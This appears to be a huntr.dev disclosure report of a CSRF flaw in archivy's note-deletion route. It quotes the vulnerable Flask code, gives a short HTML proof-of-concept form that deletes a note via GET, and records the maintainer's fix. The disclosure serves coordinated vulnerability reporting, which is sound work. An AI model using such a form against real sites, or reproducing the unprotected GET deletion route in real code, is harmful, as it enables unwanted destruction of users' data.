Cross-Site Request Forgery (CSRF) in archivy/archivy

Valid

Reported on

Dec 22nd 2021

Title

Missing CSRF token validation leads to note deletion.

Summary

Route /dataobj/delete/<int:dataobj_id> is responsible for note deletion. Instead of POST it accepts GET and DELETE methods.

@app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
def delete_data(dataobj_id):
    try:
        data.delete_item(dataobj_id)
    except BaseException:
        flash("Data could not be found!", "error")
        return redirect("/")
    flash("Data deleted!", "success")
    return redirect("/")

While they both contain CSRF tokens, in fact the token is not verified, so it is possible to exclude it from query which leads to CSRF.

Steps to reproduce

1. Create any note, get it's ID.
2. Run page from PoC.html with concrete ID in your browser, click the button.
3. Observe that the note with specified ID was deleted.

Proof of Concept

// PoC.html
<form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
<input type="submit" value="Click me"/>
</form>

Possible remediation

Use POST method instead and verify CSRF token.

Impact

This vulnerability is capable of deleting user's notes.

Occurrences

routes.py L235

We are processing your report and will contact the archivy team within 24 hours. 2 years ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Scaramouche

commented 2 years ago

Researcher

@admin Greets, my apologies for pinging, have not worked yet with repos without SECURITY.md. Should I contact the maintainer via email or you will do it yourself?

We have contacted a member of the archivy team and are waiting to hear back 2 years ago

A archivy/archivy maintainer

commented 2 years ago

Maintainer

Thanks for reporting this. It should be fixed in https://github.com/archivy/archivy/commit/796c3ae318eea183fc88c87ec5a27355b0f6a99d

A archivy/archivy maintainer validated this vulnerability 2 years ago

Scaramouche has been awarded the disclosure bounty

The fix bounty is now up for grabs

A archivy/archivy maintainer marked this as fixed in New release not yet created. with commit 796c3a 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

routes.py#L235 has been validated

Scaramouche

commented 2 years ago

Researcher

Sweet, thanks for the quick response and fix, it was nice to work with you! Welcome to the huntr.dev :)

to join this conversation

We are processing your report and will contact the archivy team within 24 hours. 2 years ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Scaramouche

commented 2 years ago

Researcher

@admin Greets, my apologies for pinging, have not worked yet with repos without SECURITY.md. Should I contact the maintainer via email or you will do it yourself?

We have contacted a member of the archivy team and are waiting to hear back 2 years ago

A archivy/archivy maintainer

commented 2 years ago

Maintainer

Thanks for reporting this. It should be fixed in https://github.com/archivy/archivy/commit/796c3ae318eea183fc88c87ec5a27355b0f6a99d

A archivy/archivy maintainer validated this vulnerability 2 years ago

Scaramouche has been awarded the disclosure bounty

The fix bounty is now up for grabs

A archivy/archivy maintainer marked this as fixed in New release not yet created. with commit 796c3a 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

routes.py#L235 has been validated

Scaramouche

commented 2 years ago

Researcher

Sweet, thanks for the quick response and fix, it was nice to work with you! Welcome to the huntr.dev :)

to join this conversation